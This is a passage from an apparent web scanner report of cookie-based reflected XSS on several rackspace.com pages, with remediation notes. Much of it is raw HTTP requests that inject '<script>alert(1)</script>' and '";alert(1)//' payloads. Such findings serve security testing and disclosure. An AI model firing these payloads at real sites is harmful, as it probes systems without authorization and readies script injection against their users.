IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26a18"><script>alert(1)</script>fa3d6c43159 was submitted in the chatslider cookie. This input was echoed as 26a18\"><script>alert(1)</script>fa3d6c43159 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_knowledge/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D26a18"><script>alert(1)</script>fa3d6c43159; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b8b1</script><script>alert(1)</script>87ac17f0907 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_knowledge/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D8b8b1</script><script>alert(1)</script>87ac17f0907; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c5e"%3balert(1)//f167e473e26 was submitted in the IS_UASrackuid cookie. This input was echoed as 36c5e";alert(1)//f167e473e26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_solutions.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f836c5e"%3balert(1)//f167e473e26; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd4c0"><script>alert(1)</script>330ba7b1d9a was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_solutions.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8dd4c0"><script>alert(1)</script>330ba7b1d9a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6b6e"%3balert(1)//1ea4afdbc5a was submitted in the chatslider cookie. This input was echoed as b6b6e";alert(1)//1ea4afdbc5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_solutions.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Db6b6e"%3balert(1)//1ea4afdbc5a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43fa2"><script>alert(1)</script>8f4111d94ca was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_solutions.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D43fa2"><script>alert(1)</script>8f4111d94ca; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee42"><script>alert(1)</script>6c3ae622e6e was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php?noflash=true HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f83ee42"><script>alert(1)</script>6c3ae622e6e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14ff2"%3balert(1)//de5d634a2e2 was submitted in the IS_UASrackuid cookie. This input was echoed as 14ff2";alert(1)//de5d634a2e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.php?noflash=true HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f814ff2"%3balert(1)//de5d634a2e2; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71319"%3balert(1)//31550deb95d was submitted in the chatslider cookie. This input was echoed as 71319";alert(1)//31550deb95d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.php?noflash=true HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D71319"%3balert(1)//31550deb95d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ee9d"><script>alert(1)</script>7a20dc89626 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php?noflash=true HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2ee9d"><script>alert(1)</script>7a20dc89626; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f584"%3balert(1)//a86a143833d was submitted in the IS_UASrackuid cookie. This input was echoed as 4f584";alert(1)//a86a143833d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/aboutus.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84f584"%3balert(1)//a86a143833d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bb1d"><script>alert(1)</script>f8c7e4a0e53 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/aboutus.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84bb1d"><script>alert(1)</script>f8c7e4a0e53; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2a1c"%3balert(1)//051ba40c348 was submitted in the chatslider cookie. This input was echoed as a2a1c";alert(1)//051ba40c348 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/aboutus.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
